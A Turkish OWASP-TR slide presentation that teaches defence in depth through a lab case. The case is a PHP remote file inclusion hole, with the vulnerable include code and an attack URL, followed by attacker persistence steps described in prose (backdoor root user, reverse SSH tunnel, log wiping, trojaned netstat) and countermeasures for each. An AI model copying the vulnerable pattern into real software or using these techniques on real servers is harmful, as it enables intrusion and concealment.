Sunuyu indir
Sunum yükleniyor. Lütfen bekleyiniz
YayınlayanGun Hamzaoglu Değiştirilmiş 10 yıl önce
1
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP-TR http://www.owasp.org KATMANLI GÜVENLİK ANLAYIŞINA UYGULAMALI BİR BAKIŞ Tahsin TÜRKÖZ turkoz@uekae.tubitak.gov.tr
2
OWASP-TR 2 İçerik Giriş - Katmanlı güvenliğin tanımı Test ortamı tanıtımı Bir PHP açıklığı Saldırılar ve önlemler Sonuç
3
OWASP-TR 3 Tanım Katmanlı güvenlik (Defence in depth, elastic defence)Katmanlı güvenlik (Defence in depth, elastic defence) –Amerikan savunma bakanlığı kaynaklı –Peşpeşe güvenlik mekanizmalarının uygulanması –Saldırıyı engeleme yerine etkilerini azaltma ya da zayıflatma stratejisi –Ana fikir: Bir savunma mekanizması devre dışı kaldığında sistemi savunmasız bırakmama –Yöntem: Her katman ile saldırganın hareket alanını daha da kısıtlama –Örnekler: Fiziksel güvenlik, güvenlik duvarı, saldırı tespit sistemi, şifreleme
4
OWASP-TR 4 Test Ortamı Tanıtımı Linux Apache + PHP Web sunucu Saldırgan Yönetici
5
OWASP-TR 5 PHP Açıklığı Uzaktan Kod Çalıştırma (RFI) Problem: Uzaktan dosya indirmeye ve çalıştırmaya izin veren web uygulama çatıları Girdi denetimi zayıf uygulamalar Etkilenen platformlar: PHP (4.0.4 sonrası ve 5.x) Diğer uygulama çatıları (Java,.NET gibi)
6
OWASP-TR 6 Uzaktan Kod Çalıştırma (RFI) Örnek SUNUCU TARAFIINTERNET /index.php?lang=tr <?php … ?> sonuç index.php <?php $language = $_REQUEST[‘lang’]; include($language.”php”); …... ?> tr.php
7
OWASP-TR 7 Uzaktan Kod Çalıştırma (RFI) Örnek /index.php?lang=http://abc.com/tr.php? <?php … ?> http://abc.com/tr.php sonuç index.php <?php $language = $_REQUEST[‘lang’]; include($language.”php”); … ?> SUNUCU TARAFIINTERNET
8
OWASP-TR 8 Saldırı – Önlem Döngü Yapısı Saldırı Karşı Önlem Çıkarılacak Dersler
9
OWASP-TR 9 Döngü #1 Saldırganın bakış açısı PHPShell yeterli mi? Saldırganın ihtiyaçları Kompleks işlemlerin yürütülebileceği bir bağlantı arabirimi Sunucunun arkasındaki sistemlere erişim Yetki seviyesi yüksek bir kullanıcı hesabı Kayıt dosyalarının temizlenmesi Bağlantıları ele verebilecek komutların değiştirilme Çözüm: Rootkit / Trojan enjeksiyonu
10
OWASP-TR 10 Tunnel yapısı
11
OWASP-TR 11 Rootkit / Trojan /root/.bashrc /etc/bash_login /root/.bash_logout /etc/bash_logout /etc/tunnel /etc/bashrc /etc/bash_logout /etc/tunnel netstat last B planı: chmod
12
OWASP-TR 12 /etc/bash_logout Kayıt dosyalarının yedeğini alır. Sistem yönetici yetkilerine sahip enjoy kullanıcısını oluşturur. SSH anahtarlarını root kullanıcısının ev dizinine kopyalar. Saldırganın bilgisayarına doğru SSH tünelini açar. Kayıt dosyalarını geri kopyalar.
13
OWASP-TR 13 /etc/bash_login Kayıt dosyalarının yedeğini alır. enjoy kullanıcının ve saldırgan bilgisayarı ile ilgili kayıtları siler. SSH tünelini ve varsa saldırgana ait aktif bağlantıları koparır. enjoy kullanıcısını siler. root kullanıcısının ev dizinindeki SSH anahtarlarını siler. Kayıt dosyalarını geri kopyalar.
14
OWASP-TR 14 Döngü #1 Karşı Önlem Yetkisiz kullanıcı (nobody) ile koşan apache Çıkarılacak Ders Minimum hak prensibi Dışa doğru açık olan bağlantı haklarının kısıtlanması
15
OWASP-TR 15 Döngü #2 Saldırı B planı olarak düşünülen SUID biti aktife edilmiş chmod komutunun kullanılması Karşı Önlem Sistemi tümüyle yeniden kurma Chroot ile hapishane yapısına geçme Çıkarılacak Ders Başarılı bir şekilde kırılmış bir sistem yeniden kurulmalıdır. Minimum hak prensibi için tek katman yetersiz kalabilir.
16
OWASP-TR 16 ChRoot
17
OWASP-TR 17 Döngü #3 Saldırı RFI açıklığı ile web tabanlı kabuk (shell) açarak; Web sayfası tahrifatı (defacement) Karşı Önlem Aktif bütünlük kontrolcüsü kullanımı - Tripwire Çıkarılacak Ders Tüm yönüyle sunucu sıkılaştırması (hardening) Minimum hak prensibi için iki katman yetersiz kalabilir.
18
OWASP-TR 18 Döngü #4 Saldırı RFI açıklığı ile web tabanlı kabuk (shell) açarak; Syscall kullanılarak Hizmet Dışı Bırakma saldırısı Kaynak kodu ifşası Karşı Önlem PHP kodunu düzeltme Çıkarılacak Ders Açıklığın kaynağını bulup, önlem alınması Katmanlı güvenlik anlayışının önemi
19
OWASP-TR 19 Sonuç Kurumsal bilgi sistemlerinde bütün açıklıkların farkında olmak ve zamanında gerekli önlemleri almak çok zordur. Katmanlı güvenlik ile farklı güvenlik mekanizmaları uygulayarak saldırıların etkileri azaltılabilir.
20
OWASP-TR 20 Faydalı Linkler & Sorular chroot http://www.unixwiz.net/techtips/chroot-practices.html http://www.cgisecurity.com/webservers/apache/chrootapache2- howto.html apache güvenliği http://www.securityfocus.com/infocus/1694 http://www.securityfocus.com/infocus/1786 http://www.apachesecurity.net/ modsecurity http://modsecurity.org/ PHP güvenliği http://www.php-security.org/ www.owasp.org
21
OWASP-TR 21 Faydalı Linkler Unix/rootkit/trojan http://vil.nai.com/vil/Content/v_100721.htm http://www.rootkit.com/ http://www.antirootkit.com SSH ile tünel http://www.securityfocus.com/infocus/1816 http://www.rzg.mpg.de/networking/tunnelling.html http://www.ccs.neu.edu/howto/howto-sshtunnel.html Unix güvenliği http://www.cisecurity.org http://www.princeton.edu/~psg/unix/security.html http://www.auscert.org.au/7284
Benzer bir sunumlar
© 2024 SlidePlayer.biz.tr Inc.
All rights reserved.